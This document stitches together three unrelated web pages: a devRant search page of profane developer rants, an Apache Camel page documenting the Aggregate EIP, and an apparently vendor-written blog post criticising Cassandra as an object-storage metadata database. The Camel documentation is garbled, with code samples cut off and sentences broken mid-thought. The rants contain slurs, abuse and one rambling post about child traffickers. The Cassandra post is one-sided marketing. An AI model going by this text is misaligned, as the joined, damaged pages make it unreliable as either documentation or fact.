- God damnit Quora! I stumbled upon some article or post or whatever they are called on quora. And I really wanted to read the comments on it. It wouldn’t let me unless I log in. I normally don’t do that but I thought I’ll make an exception because I really wanted to read the comments. So I clicked on that comments button and logged in (via google). First it presented me some modal dialog to pick 5 things that interest me. And it was mandatory. Fine… I picked those 5 things. Finally it presents me the list of articles or whatever. But not the same list that I have seen before I was logged in. Scrolling, the article of my interest is not there. God damnit! Just show me my comments for fucks sake. I go back to that tab where I was not logged in to somehow copy the link of that article or the link to the comments section. But it doesn’t let me. Some bullshit pseudo smart layer of crap is preventing me from doing anything. Then I abuse the fucking share link to visit it in my logged in tab to finally see the comments that I came for. And the comments weren’t even worth it. God! What a waste of time! And how can one fuck up a fucking forum so much? It will be a lesson for me not to visit Quora ever again.4 - - The MS Teams SDK is bullshit. It's so half baked and comes with instructions like "you'll probably want a better implementation for production, good luck cause you'll have to write it yourself." Oh and don't forget to cache your installations in a file called "notifications.json" Deploying will create 2 app registrations (OIDC) and about 6 resources in Azure... But "you'll probably want to log to app insights in production"... So I hope you're very familiar with Bicep cause you'll have to figure out how to add that to your template properly and there are about 7 Bicep files to decipher and it doesn't create an app insights out of the box. Probably written by an intern.2 - Fuck you ios,storyboad,xibs,xcode. FUCK OFF!! YOU FUCKING ASSHOLES. Literally giving me migrane with your fucking ass constraints!! Fuck you xcode for not having a terminal. Ios is utterly bullshit. Has fucking all kind of devices that I have to set constraint. Fuck you macos. You are slower than a snail. How on earth do you take so much time to build!! Width, height, constraints, my ass! What is this fucking logic bro. Fuck you apple for making so many device of different sizes and then hiring us to set constraints. Warning warning warning oh what a load of crap! I would rather die than set your fucking ass constraints.6 - Central team: No, your team must be doing something wrong. Our pipeline is super-configurable and works for any situation! You just have to read the docs! Me: Where are the docs? Central team: Uhh, well, umm... we'll hook you up with a CI/CD coach! Me: Okay, cool. In the mean time, can you point me at the repo where all the base scripts are? Central team: Sure, it's here. Me, some weeks later: Yeah, uhh, the coach can't seem to figure out how to make our Prod deployment work either. Central team: That's impossible! It's so easy and completely configurable! Me: Well, okay... but, here's the thing: your pipeline IS pretty "configurable", in the sense that you look for A LOT of variables... Central team: See! We told you! Me: ...none of which are actually documented, so they're just about useless to me... Central team: But, but the coach... Me: ...couldn't make heads or taisl of it either despite him literally being ON YOUR TEAM... Central team: Then your project must just be architected wrong! Me: Well, we're not perfect, so could be... Central team: Right! Me: ...but I think it's far more likely that the scripts... you know, the ACTUAL Python scripts the pipeline executes... while it took me DAYS to get through all your levels of abstraction and indirection and, well, BULLSHIT... it turns out they are incredibly NOT flexible. They do one thing, all the time, basically disregarding any flexibility in the pipeline. So, yeah, I'm thinking this is probably one of this "it's you, not me" deals. Central team: Waaaaahhhhhhhh!!!!! - “You know what is not fungible, scarce and valuable to me? My time! So if you wish to persuade me NFT are a good thing, you should pay me a fair amount of real money to make me listen your bullshit” From now on this will be my standard reply to NFT harassment. Feel free to use, edit and share with others.5 - - Hiring a third party to help us with something... Third party: yeah okay, we know what we need. Can we get access to your git repo Me: sure, I'll make sure you'll get it (To the admins): hey can you get them access to our git server? Admins: did they sign the personal data processing contract? Me: oh they won't work with any personal data. It's a dev server and they only need access to the source code. And the usual contracts and NDAs are already done Admins: well we still need the other one. ... Sure. Why not. Just delays the start of the process for... Like a week and a half until that useless bit of paper has passed through all the necessary departments. Not like time's an issue. Right - So my google assistant keeps bugging, my amazon app keeps glitching, my mac's display config get shuffled every time the computer wakes... And we're supposed to do 10 rounds of bullshit whiteboarding interviews to work with these morons?1 - I’ve never seen a rich person give a step by step guide that led them to where they are, it’s always some beat around the bush bullshit20 - i don't have the energy to argue against this bullshit any longer when you're trying so hard to build a piece of crap that nobody needs, fine - Headhunter called about a rejection for an assignment I did: Assignment had malformed data examples Assignment had unrealistic timespan for completion Assignment used item stocks for a shop setup Assignment didn't use any prices just item stocks Who builds a webshop without prices in the first place? So done with this job hunting assessment bullshit - [CMS Of Doom™] Ah, yes, their built-in bullshit newsletter module just sent the n-th user n emails. Wonderful considering n=368. The culprit? Better don't ask... OK, anyway: So the mailer is running as a CRONjob, but nah, not as a console script call but by a public HTTP GET URL call, fucking obviously (it's the CMS Of Doom for a reason). So these fucking imbeciles "implemented" an ob_start() callback where HTML links are - for whatever fucking reason - modified by some regex (obviously everybody knows parsing HTML by Regex is trivial). In this case the link was somehow modified to recall the mailer Cronjob... This must have upset the pngoing mailing process thus spamming mails. Whyyyy And I've thought I've seen it all after 6 months in this legacy hell... This is why you don't run a company consisting of only beginners in PHP (in cluding their "CEO")! - - You know when you work with an incompetent team or organization? No one knows what they are doing and there is no competent leadership to set high standards and people are making their own bullshit up? Yeah? That's my current workplace.3 - The overuse of something is designed to demoralize and discourage the very thing. Vapid christmas jingles, meaningless consumerism, blackfriday shopping, keeping up with the joneses, decorations and tinsel bullshit so overloaded on homes and trees that it looks like a gaudy airstrip display, holiday-town-esque themes and festivals so frequent, overcooked and overcommercialized that its like you've stepped into a 40-year-old sterile suburban house-wives braindrain internal fantasy reruns of regurgitated hallmark christmas romance movies. Alls fair love and christmas. In other news, some strapping young and intrepid adventurer *lit a public christmas tree on fire*. Its a shame really, when we can't just enjoy the simple things without some dickhead going and spoiling it. But also I can't help but ask "ARE YOU NOT ENTERTAINED?!"13 - - Woke up, worked out, went back to bed. (?? Yeah I'm surprised too) Slept for an hour, woke up again, worked tirelessly and finished the slides. (Not as easy as you think. Had to drag out and undust a few jupyter notebooks again, plus realized that the stupid past me has deleted a bunch of notebooks because of lack of space, and I had to remake one again.) Now I have to figure out why google slides doesn't like to play my videos, and write my script (don't give me the "don't practice too much" bullshit or "don't need a script". That's for losers. You gotta practice enough that you can cite your presentation even if you got a concussion in the middle of the presentation. Plus, you can modify content in the middle of presentation based on the crowd vibe but you can't do that without knowing your script by heart, can you?) Aaaaaand what was I saying... I forgot... Geez ... Well, wish me luck. This week is gonna be tough. And next week. And probably the week after. Ew.6 - - Brothers and sisters I have ascended From my early chilidhood I was taught by my parents & society that I should put effort into doing things that I "MUST", be kind and polite to others Tis' all bullshit; never lift a finger if you do not feel like it; never help people free of charge; if you dislike a particular undertaking then it is not worth even an ounce of effort. We live in a society.12 - Previous department director. I loved working with the dude. He had a no bullshit attitude and would always back up and defend his people, he would tell us that whenever he sticks his neck out for us we better be in the right because he would go full ballistic and did not wanted to make a fool of himself or the department. Dude was fucking amazing. He was happy when I accepted the promotion but told me that he wanted me to shadow him to learn more about proper management techniques. It was a clear mentor trainee relationship, but he had 100% full trust in my ability and knowledge. He retired about a year ago, got a new director, dude ain't thaaaat bad but he has a lot of cons, as a person I like the new boss, as a boss I am not convinced entirely since he has not been around for long, but it does feel that he does not listen, goes in one ear and out through the other kind of person. - - Working on another SaaS product, and now I've run into a "fun" conundrum that is hard to determine cleanly in an automated fashion. I'm certain it's stupid bullshit opinionated conventions like this as to why so many devs are driven to burnout and bitterness...3 - "Hey can you make this excel report for me real quick? Here are the columns, you gotta get them from this table in the database. Shouldn't take long." Alright, sounds easy enough wait where is the data. I have to join how many tables? What is this bullshit data? I want to strangle the guy who modeled this piece of garbage.5 - - So with the advent of Docker Desktop going premium we thought we'd buy a couple licenses... What did the HR team say? "No, you're fine - we can just keep using it - how will they know?" WHAT??!!! I will NOT be the one who gets brought into a multi-million dollar lawsuit because HR are a bunch of nitwits. I will fight this with everything I have so that when ouch time comes, i can say i didnt participate in the shady bullshit these people are recommending.17 - - I think I've reached some kind of job nirvana. My coworkers and I all complain about our work. We're overworked, underappreciated, underpaid, and and have to deal with all sorts of bullshit all the time. Pretty much everyone who has been on the team longer than a year is talking about quitting. But I started at this company as a level 1 tech support phone technician before I transferred into the DevOps side of things, and that tech support job was SO much worse. Way more stressful, way less pay, mandatory overtime, horrible scheduling, being forced to remain calm while people hurl insults at you over the phone, and it was a dead-end job with a high turnover rate and almost no opportunities for advancement of any kind. And every time I think back on that job, I realize that what I have now is actually pretty great. I'm paid well (still underpaid for the job I do, but catching up really fast due to my current boss giving me several big raises to keep me from quitting lol). I deal only with other tech people like developers and data scientists so no more listening to salesmen insult me on the phone. I'm not in any sort of customer service role so I can call people on their bullshit as long as I'm professional about it. I'm salaried so they can't make me work horrible shifts. 99% of my days are a normal 9-5 workday. I actually have a reliable schedule to plan around. People treat me like the adult that I am. I'd get a similar experience at other, better-paying companies, for sure, but what I have now is still pretty great. I'm sure I'll be back in a few days to rant about more nonsensical bullshit and stress, but for now I'm feeling the zen. -22 - Imagine seeing words like developer:ess, member:esses or user:ess in artices on the web becoming more and more popular. Pretty dumb, yes? That’s what happening right now with the German language with something called gender-language. It hurts my eyes reading Entwickler:innen, Mitglieder:innen and Benutzer:innen. People argue that words like Entwickler are excluding woman by using the male form by default. But it’s just a matter of perspective. Why not just define this as the neutral form just like in english? Developer is neither male nor female. Everybody is fine with that. Yet the Germans are messing around with this gender shit and making text unreadable for no reason at all. It’s just bullshit!21 - .. - Well here it goes, I started out in customer support (A lot of stuff to tell here). 1. One of my colleagues would come to work drunk, like every day he would smell of boze (the hard stuff 80%+). When a customer got on his nerves he endet the call and threw his Keyboard across the room. He worked in the company 3+ Years after I left. 2. Another colleague would connect to his Personal Computer at his home and play WoW while at work ( Allthough the man was a genius with a lot of free time, until a new task was assigned to him) 3. My Boss at the time did some really shitty things. I worked 17 hour days (while I was 18) for a week, and at the end of the week he shredded the accrued overtime with some Bullshit Explanation. (I did not stay long after this shitshow happened). 4. A dispatcher who sent our technicians out scheduled their tasks so that they were on the road for weeks and did not see their families. This led to a very strong turnover among technicians. And yes, this company still operates today.1 - How to manage when you start something good for you, start taking decisions for your good and people start spreading hate about you. It obviously will effects your mental health right? How you guys manage it? I mean how? Today I'm feeling of getting bullied and getting bullied again from the same person. I'm correct but can't show the correctness just because there's no proof I've in-hand. I'm literally tired of people now - Just keep getting the dumbest tickets from a client as a Frontend dev. I told them I am a backend and even my contract says backend but I made the mistake to help them with some themes. So fucking ready to take other interviews where I don't have to deal with bullshit colors and fonts anymore.2 - - Worst was getting head hunted into my current role at this terrific company. Three months later I’m done with it. It’s not shit shitty codebase, or the lack of direction that self governing teams have. It’s not the megalomaniac company owner. It’s the bullshit team mobbing and 8 hours of video calls a day. The best part. Come he’ll or high water I’m getting myself out before the end of the year. I’d rather be busy and have f’k all chance of promotion than any more of this. At least the day will fly by. Just hope I don’t make the same mistake twice, that’s become my biggest worry now. - - When the team lead has no idea what the problem is but took too many public speaking courses so he’s really well-versed at feeding people bullshit…1 - 🍻 - Retarded WSL crashed which means I lost all my fucking logs How do people even work on this retarded OS? Is it just a scam for parasites to pretend they work and leeche on society using their precious little intellectual property bullshit12 - - - Reminder: if you were tasked with breaking down a work item/story, and your breakdown involved so much incorrect, outdated, and downright incomprehensible gibberish that, when you were approached by another dev, you had to rewrite the whole thing -- after rewriting it into a form that includes almost none of the original and still contains errors and omissions, you do not get to announce to everyone that you were 'helping' said dev to 'understand'. If you do this you are not some machevellian linguistic genius, you are just an asshole who is going to get found out for your bullshit sooner or later.7 - Play Store's $25 registration fee - for getting PWA listed in their shitty catalogue? Who in the right mind would even jump in this clusterfuck of store to find a *web* app? For all you know, Google, there is such thing as QR codes - and customers can just scan the code (or type in that sweet address). Voila! Boom!!! Ching-ching! Hello-hello, monopolistic cashgrabage! I came to inform you that your TWA bullshit is unneeded in ETHICAL space. The only ones who would benefit from this thing are permission-hungry publishers. And I'm already sick of this culture where people are put into store bubbles. You can't hide the fact that this data and features you provide, with "native" layer, may be misused in a jiffy - and by big players, no less. Of course, as a vile dumpster that you are, you don't mind it. Don't even bring up a battery consumption that comes with PWA and browser. This doesn't matter if you use an app for some 2 minutes to tick your mental checkboxes! I'm just sick of app stores and native apps that collect the data without normal warning, and dare to take more than 1 second to fucking load the cached data. Take a lesson or two from PWAs that collect (probably useful) cache, instead of my specs, and load almost instantly.11 - FUCK YOU PHP, FUCK YOU SYMFONY AND DEFINITELY FUCK YOU SHOPWARE. Don't get me wrong, PHP has evolved a lot, but the stuff people are building with it is just the biggest load of fucking shit I have ever seen: Shopware. Shopware is the most ass-sucking abomination to extend. It's nearly impossible to develop anything beyond "use the standard features and shut the fuck up" that is more sophisticated than a fucking calculator. The architecture of this pile of crap is the worst bullshit ever. A mix of OOP, randomly making use of non OOP concepts and features together with the unnecessarily HUGE amount of useless interfaces and classes. Sometimes I feel like it's 90% fucking shitty boilerplate shit. And don't get me started with TWIG. It's a nice thought, but WHY THE BLOODY FUCK WOULD YOU NOT USE VUE IF YOU ARE ALREADY USING IT FOR A DIFFERENT PART OF SHOPWARE. This makes no fucking sense whatsoever and makes development of new features a huge pain in the ass. I can't comprehend how people actually like using this shit. OH AND THE DATABASE. OH MY FUCKING GOD. This one is bad. Ever tried to figure anything out in a database where random strings (yes MySQL "relational" - you might think) that are stored as text in a JSON format make up some object or relations during runtime?? Why the fuck do you have foreign and primary keys if you don't use them properly?? Seriously you can't even figure out which data belongs to what because the architecture just sucks fucking ass. FUCK YOU Shopware wankers, you suck, your product sucks, your support sucks, your architecture sucks and you keep releasing new versions that regularly break shit even in minor versions. I used to like PHP, but not in projects like these - The install will take about one more minute… *go make a cup of tea, pack for holiday, go on holiday, return from holiday* Ah still installing for one more minute my old friend - Wow i left this platform for almost a year because you guys were to right wing political and after 2 minutes of reading again i see some right wing conservative bullshit. You should just solve in reddit. I deinstall now.14 - My biggest challenge is not telling the people who wrote code I get to maintain that it is a big pile of shit. My fear is I will forget I wrote said code and proceed to complain about said code. Then someone will point it out that I wrote said code. So it is kind of a self preservation strategy. Also, in meetings, when my boss calls something a "piece of software", I have to refrain from giggling.3 - - what is your "dev sitting in a dumbfuck meeting being forced to waste their time listening to bullshit" spirit animal? mine is katsuki bakug - Thanks google for creating the illusion of an option to change the shipping address for a repair order. You even mention the new address in your notification email, but when I click on UPS tracking, I can see that you sent the shipment to the old address, which is in a different city where I can't quickly go to pick up my repaired phone. After charging an extra 95,- Euros for additional damage supposedly not covered by my warranty. Lucky you that my old phone had connection problems with the shitty Vodafone station wi-fi router, which is one of the few reasons that I still even want to use a google hardware product. Thanks google for just being slightly less wretched and mediocre than your competitors, that might grant you some more years before you will be buried in history forever. Pixel phones are just like Macbooks: high quality product and good marketing, good enough to make your customer accept everything else being bullshit. Google search is even worse, but based on the same concept: just suck a little less than your competitors but don't waste any effort trying to actually be really good at anything - Ok so I have - a legal structure (or several of them actually) - infrastructure - website design is being made - logo and visual identity - one client and a pet project for portefolio What I need: - clients How I do that: - Buying leads and paying a dude to call them - Paying a CM - Networking (I guess) - Printing posters and putting them all over Paris, LDN, Barcelona and Berlin. Am I doing this right? I really don' wanna take another bullshit job just to pay the bills. I wanna go back to doing cool shit for radio stations and restaurants and stuff. Do the UX, get a design, create them a remix + headless strapi plus some random shit if needed. Get paid. Rince. Repeat3 - - Any advice on how to find proper customer as a freelancer? Should I go on fiverrr and pay for coldcalling and an assistant? Because honestly I'm sick of corporations employing me (my company) for the sake of not paying taxes but still expecting a 9 to 5 and all the corporate bullshit. I just want to get customer, do UX, pay a designer, get figmas, implement, invoice, repeat. Not have 3 hours spring grooming calls stuck between a team meeting with management, a demo and a mid-spring alignment review. Is that too much to ask?7 - This jobhunting with recruiters is such bullshit. Haha. I'm gonna troll my way away from them fuckwits.1 - - Getting super demotivated looking at job postings on both indeed and glassdoor - they all seem like the same generic bullshit of maintaining some website... does anyone have suggestions of how to find companies that are building exciting products that aren't dinosaurs?8 - MySQL Innodb easily get crashed, bullshit, I just restarted my server now all databases get corrupted. F*ck you OVH3 - - I think you already know by now, but I have to say it. The update of the discord app is utter shit, brought only downgrades to me and they still refuse to fix bug that have been prevalent on their platform for years to force their shiny, new, untested bullshit down your throat - you know they call me 'good' which in their speech is an insult. do they ever pay fucking attention or can they not conceive of what a real human is like ? especially one that is conflicted on various levels as a result of abuses, loneliness, depression, survival interests, years of bullshit, etc ? I'm not immune to temptation or corruption, I'm just extremely resistant. - - - I implore ANYONE... please... Have you EVER written a SINGLE Jest test that didn't have some sort of bullshit spewing stuff like this: "ReferenceError: You are trying to `import` a file after the Jest environment has been torn down." "Warning: React.createElement: type is invalid -- expected a string (for built-in components) or a class/function (for composite components) but got: object. You likely forgot to export your component from the file it's defined in, or you might have mixed up default and named imports." and yet running on a device, features work flawlessly and quite well, no errors or even warnings in sight logged This is the most fragile pile of garbage I have ever seen. I hate this. inb4 your stupid ass todo boilerplate garbage you wrote tests for in freshman year. i'm talking about a REAL app with HUNDREDS of components. where the grownup testing tools at? it's a question I've still not answered after a year of fucking around with this framework2 - - I swear to god, getting Chumsky to do my bidding has almost taken longer than writing a parser by hand. I'm not looking for operator precedence, I'm not looking for complicated rules or anything, the main part of my language is literally just S-expressions, with some top level bells and whistles. I don't even have a working lexer yet because I wanted to use this piece of shit library which usually matches the fewest possible characters to parse significant newlines but the Padded combinator takes as much whitespace at the end as it can find, and a host of other atomics don't actually adhere to the library's lazy principle in their procedural implementation. I've had enough. I'm going to bed, and tomorrow I'm writing tickets. Actually, I'll probably also write PRs because I actually want the fixes to exist and not just complain about the problems, but I also really want to complain before I get started on that because I spent about two weeks just on this bullshit.3 - I have to participate in this retarded conference for 2 days and then I will have to join this fucking summer gathering on my weekend and that will take whole day. Fuck this fucking corporate bullshit. Better give me a fucking raise or better yet start fucking managing this scrum team because half of devs are not pulling their fucking weight. Fucking BA too lazy to update issues with new details after grooming so each time I pick a new task I either have to somehow remember what we discussed weeks ago or I have to spam you with questions so you would run around like chicken without head while gathering answers to questions that were already discussed because you are too lazy of a fuck to compile notes. And even that is not enough, my merged MR's apparently dont cover all the use cases because your'e too incompetent to even figure out how our app works and define properly the task. And then theres supposedly a techlead dev whos not taking a ticket when theres 3 days left till end of the sprint and he goes: "But a task spillover will happen!!!". Yeah so I guess just sit on your ass and wait for new sprint so you could pick yet again another low hanging fruit task and marinate it for weeks. Motherfucker I checked your MR's in the last 6 weeks you did 1 week worth of work. You are a techlead but your only dev colleague is asking us for help daily because you dont even help him Fucking lazy and incompetent bastard. - SAFe PI objective "business value" estimates are complete and utter bullshit. Every objective is a 10? Let's work on all of them in parallel! Fucking genius!2 - anyone made something that sits there and tells youtube to filter out content from other history lists and or certain subject material to allow something not inundated by their 'it' bullshit to shine through ? also, this time, how about you all take pictures of seeming parents so their children's locations are accounted for at all times and the child traffickers working on camera here can get caught ? they wouldn't be able to say kill their captives if they absence of the child was noted. Top Tags
https://devrant.com/search?term=bullshit
CC-MAIN-2022-40
en
refinedweb
Aggregate correlation key. Messages with the same correlation key is aggregated together, using an AggregationStrategy. Worker pools The aggregate EIP will always use a worker pool, that is used to process all the outgoing messages from the aggregator. The worker pool is determined accordingly: If a custom ExecutorServicehas been configured, then this is used as worker pool. If parallelProcessing=truethen a default worker pool (is 10 worker threads by default) is created. However, the thread pool size and other configurations can be configured using thread pool profiles. Otherwise, a single threaded worker pool is created. Aggregating The AggregationStrategy is used for aggregating the old, and the new exchanges together into a single exchange; that becomes the next old, when the next message is aggregated, and so forth.; } } } Aggregate by grouping exchangesMessage().getBody(List.class); Aggregating into a List If you want to aggregate some value from the messages <V> into a List<V> then you can use the org.apache.camel.processor.aggregate.AbstractListAggregationStrategy abstract class. The completed Exchange that is sent out of the aggregator will contain the List<V> in the message body. For example to aggregate a List<Integer> you can extend this class as shown below, and implement the getValue method: public class MyListOfNumbersStrategy extends AbstractListAggregationStrategy<Integer> { @Override public Integer getValue(Exchange exchange) { // the message body contains a number, so just return that as-is return exchange.getIn().getBody(Integer.class); } } The org.apache.camel.builder.AggregationStrategies is a builder that can be used for creating commonly used aggregation strategies without having to create a class. The previous example can also be built using the builder as shown: AggregationStrategy agg = AggregationStrategies.flexible(Integer.class) .accumulateInCollection(ArrayList.class) .pick(body()); Aggregating on timeout. Aggregate with persistent repository The aggregator provides a pluggable repository which you can implement your own org.apache.camel.spi.AggregationRepository. If you need persistent repository then Camel provides numerous implementations, such as from the Caffeine, CassandraQL, EHCache, Infinispan, JCache, LevelDB, Redis, or SQL components. Completion When aggregation Exchanges at some point you need to indicate that the aggregated exchanges is complete, so they can be sent its override the preCompletemethod AggregateController - which allows to use an external source ( AggregateControllerimplementation) to complete groups or all groups. This can be done using Java or JMX API. All the different completions are per correlation key. You can combine them in any way you like. It’s basically the first which triggers that wins. So you can use a completion size together with a completion timeout. Only completionTimeout and completionInterval cannot be used at the same time. Completion is mandatory and must be configured on the aggregation. Pre-completion mode There can be use-cases where you want the incoming Exchange to determine if the correlation group should pre-complete, and then the incoming Exchange is starting a new group from scratch. The pre-completion mode must be enabled by the AggregationStrategy by overriding the canPreComplete method to return a true value. When pre completion is enabled then the preComplete method is invoked: /** * correlation groups is completed (without aggregating the incoming exchange ( newExchange). Then the newExchange is used to start the correlation group from scratch, so the group would contain only that new incoming exchange. This is known as pre-completion mode. When the aggregation is in pre-completion mode, then only the following completions are in use: completionTimeout or completionInterval can also be used as fallback completions any other completion are not used (such as by size, from batch consumer etc) eagerCheckCompletion is implied as true, but the option has no effect CompletionAwareAggregationStrategy If your aggregation strategy implements CompletionAwareAggregationStrategy, then Camel will invoke the onComplete method when the aggregated Exchange is completed. This allows you to do any last minute custom logic such as to clean up some resources, or additional work on the exchange as it’s now completed. You must not throw any exceptions from the onCompletion method. Completing current group decided from the AggregationStrategy The AggregationStrategy supports checking for the the exchange property ( Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP) on the returned Exchange that contains a boolean to indicate if the current group should be completed. This allows to overrule any existing completion predicates / sizes / timeouts etc, and complete the group. For example the following logic will complete the group if the message body size is larger than 5. This is done by setting the exchange property Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP to true.; } } Completing all previous group decided from the AggregationStrategy The AggregationStrategy checks an exchange property, from the returned exchange, indicating if all previous groups should be completed. This allows to overrule any existing completion predicates / sizes / timeouts etc, and complete all the existing previous group. The following logic will complete all the previous groups, and start a new aggregation group. This is done by setting the property Exchange.AGGREGATION_COMPLETE_ALL_GROUPS to true on the returned exchange. controller to force the aggregator to complete: returned value is the number of groups completed. A value of 1 is returned if the foo group existed, otherwise 0 is returned. There is also a method to complete all groups: int groups = controller.forceCompletionOfAllGroups(); The controller can also be used in XML DSL using the aggregateControllerRef to refer to a bean with the controller implementation, which is looked up in the registry. When using Spring XML you can create the bean with <bean> as shown: . Aggregating with Beans To use the AggregationStrategy you had to implement the org.apache.camel.AggregationStrategy interface, which means your logic would be tied to the Camel API. You can use a bean for the logic and let Camel adapt to your bean. To use a bean a convention must be followed: there must be a public method to use the method must not be void the method can be static or non-static the method must have 2 or more parameters the parameters are paired, so the first half is applied to the oldExchange, and the reminder half is for the newExchange. Therefore, there must be an equal number of parameters, eg 2, 4, 6 etc. The paired methods is expected to be ordered as follows: the first parameter is the message body optional, the 2nd parameter is a Mapof the headers optional, the 3rd parameter is a Mapof; }: public String append(String existing, Map existingHeaders, String next, Map nextHeaders) { return existing + next; } And finally if we have 6 parameters, that includes the exchange properties: public String append(String existing, Map existingHeaders, Map existingProperties, String next, Map nextHeaders, Map nextProperties) { return existing + next; } To use this with the aggregate EIP we can use a bean class bean: can also specify the bean class directly in strategyRef using the #class: syntax as shown: <route> <from uri="direct:start"/> <aggregate strategyRef="#class:com.foo.MyBodyAppender" strategyMethodName="append" completionSize="3"> <correlationExpression> <constant>true</constant> </correlationExpression> <to uri="mock:result"/> </aggregate> </route> You can use this in XML DSL when you are not using the classic Spring XML files; where you use XML only for Camel routes. Aggregating when no data When using bean as AggregationStrategy, then the method is only invoked when there is data to be aggregated, meaning that the message body is not null. In cases where you want to have the method invoked, even when there are no data (message body is null), then set the strategyMethodAllowNull to true. When using beans bean a timeout was hit after 1 second. So if we need to do special merge logic we would need to set setAllowNullNewExchange=true. If we don’t do this then on timeout> Aggregating with different body types When for example using strategyMethodAllowNull as true, then the parameter types of the message bodies does not have to be the same. For example suppose we want to aggregate from a com.foo.User type to a List<String> that contains the name of the user. We could code a bean as follows: public final class MyUserAppender { public List addUsers(List names, User user) { if (names == null) { names = new ArrayList(); } names.add(user.getName()); return names; } } Notice that the return type is a List which we want to contain the name of the users. The 1st parameter is the List of names, and the 2nd parameter is the incoming com.foo.User type.
https://camel.apache.org/components/3.12.x/eips/aggregate-eip.html
CC-MAIN-2022-40
en
refinedweb
Home » UncategorizedWhy Cassandra is a poor choice for an object storage metadata database /> JonathanSymondsJanuary 24, 2021 at 2:30 am /> Cassandra is a popular, tried-and-true NoSQL database that supports key-value wide-column tables. Like any powerful tool, Cassandra has its ideal use cases – in particular, Cassandra excels at supporting write-heavy workloads, while having limitations when supporting read-heavy workloads. Cassandra’s eventual consistency model and lack of transactions, multi-table support like joins, subqueries can also limit its usefulness. However, using Cassandra as a metadata database for an object storage system introduces significant complexity resulting in data integrity and performance issues at scale – particularly if one wants to use their object store as a primary storage system. Object storage needs are far simpler and different from what Cassandra is built for. Because the implications of employing Cassandra as a object storage metadata database were not properly understood, many object storage vendors made it a foundational part of their architecture – unfortunately it keeps them from ever moving past simple archival workloads into the modern workloads that define the future of object storage (AI/ML, analytics, web/mobile applications). Let’s explore why in a little more detail. Cassandra was never designed to manage file or object storage metadata and it is predictably weak in this regard. It is not ACID compliant. It does not have the rigidity to prevent partially successful writes, dupes, contradictions and the like. Cassandra does not support joins or foreign keys, and consequently does not offer consistency in the ACID sense. Further, there is no capacity to roll back transactions in the event of a failure. While Cassandra supports atomicity and isolation at the row-level, it trades transactional isolation and atomicity for high availability and fast write performance. Cassandra is categorized as an AP system in CAP. Meaning it trades Consistency for Availability and Partition tolerance. When employing Cassandra as a metadata database for an object store, you can either be fast or consistent – but not both at the same time. Cassandra’s tunable consistency is a compromise, not a feature. Any setting other than QUORUM or ALL means you are at risk of reading stale data. It is important to apply this consistency setting for both read and write operations in addition to the object data operations performed outside of it. In the object storage world, the implication is that you can be good for archival use cases (write once, read very infrequently) or you choose a different architecture. Similar to the consistency problem, durability guarantee is also a tradeoff between performance and correctness. The storage engine’s default commit log is set to sync periodically every 10 seconds. This means you will lose up to 10 seconds worth of latest updates in the event of power failure. The only reasonable way to make Cassandra durable is to use the synchronous batch mode committer which comes with a performance penalty. Cassandra’s high-availability guarantee is not suited for erasure coded object stores. With a replication factor of 3 and consistency quorum of 2, Cassandra can only tolerate a single node / drive failure within a replication group. Increasing the replication factor and quorum consistency to 5 or higher serves only to make the meta performance go from bad to worse. Unlike replication, erasure coding can tolerate multiple servers and drives failures in a distributed system. Even if you have configured the erasure code setting to 6 parity (any 6 nodes may fail) in a 16 node setup, you are still limited by the weak link, i.e Cassandra’s replication factor. The ops team is often unaware of these high-availability surprises until it is too late. Object storage systems organize the data in a tree structured hierarchical namespace. Since Cassandra does not support a hierarchical key namespace, you will have to build a tree data model on top for each directory prefix and also maintain a flat list for direct lookups without directory walk. Atomically updating multiple tables with batched commit log and full read / write quorum is slow and prone to corruption. While objects themselves are immutable, the object storage system is mutable. When you add, remove, overwrite objects and its metadata, apply policies, collect metrics, grant session tokens and rotating credentials, the metadata is always mutating. Cassandra is not designed to handle this level of metadata mutation and definitely not for the primary storage workloads. Long term archival use cases where the objects are large (GBs in size) and infrequently accessed, will work – other use cases will not.. The reason is that Cassandra’s log structured storage system quickly appends new writes to the end of the log file, but delays the deletes and overwrites with a tombstone marker. Vacuuming these tombstones is an expensive operation, because the actual delete operation is applied by copying the SSTables to a new table sieving the stale entries in the process. This operation has to be performed on all the nodes simultaneously. If you delay vacuuming, excessive tombstones will result in increased read latencies, memory GC pauses and failed queries. Some object storage vendors use an additional Redis database to offload Cassandra’s pressure. Using two databases to manage an object stores metadata is hardly elegant and introduces additional points of failure. The biggest gotcha? You won’t see these problems until you are deep into production and it is too late. Small objects (KB to MB in size) will fill up the metadata drives dedicated to Cassandra much sooner than the data drives. Also small object workloads exacerbate Cassandra’s limitations, because they are sensitive to latency and consistency issues. Some vendors store small objects entirely inside Cassandra to address this problem. At this point, you are merely looking at an S3 proxy on top of Cassandra database. This too is a bad practice. If you use your object store for large objects and employ erasure coding and use Cassandra as your data store for small objects and use replication – you have introduced a non-trivial SLA problem. In this approach, data is protected by different guarantees. Given that drives die all the time, the probability of serving an old object or a corrupted object goes up considerably. As noted above, your metadata database is now the weak link. Availability, consistency and durability guarantees are only as good as the weakest link. If the weakest link employs replication (three copies) you can only withstand one-node or one drive failure before losing data. A counter argument might be to replicate five copies. The result is a massive performance hit and you can still really only withstand two-node or two-drive failure. In using replication for small objects and erasure coding for large objects you also undermine the efficiency gains associated with EC. If you only use erasure code for large objects (likely a small percent of your overall object pool) you don’t gain much but increase your exposure considerably. Employing Cassandra as your metadata database for an object store also introduces a troublesome Java dependency. This in turn can result in bloatware and memory management issues. Cassandra taxes the JVM memory management with constant large scale metadata allocation and mutation resulting in memory exhaustion and garbage collection pauses. The obvious takeaway is that it is a lot more complicated to operate a Cassandra cluster than a properly designed object storage system. Cassandra is built for a different purpose and object-storage meta-data is not one of them. The areas where Cassandra struggles are the areas that are core to a performant, scalable and resilient object store. The last point is of note – object storage is a natural fit for blob data and that is why Erasure Coding is so effective and efficient. Cassandra is designed for replication. When you use that model for metadata it breaks the object store’s erasure coding advantage (or at the very least makes it brittle and prone to breakage). Bottom line. Write your metadata atomically with your object. Never separate them. We welcome your comments. Feel free to engage us on Twitter, on our Slack channel or by dropping us a note at [email protected]. Tags:Uncategorized previousDiscover Data Trends with Embedded Analytics and Business IntelligencenextData Science Central Weekly Digest, 25 Jan 2021
https://www.datasciencecentral.com/why-cassandra-is-a-poor-choice-for-an-object-storage-metadata/
CC-MAIN-2022-40
en
refinedweb
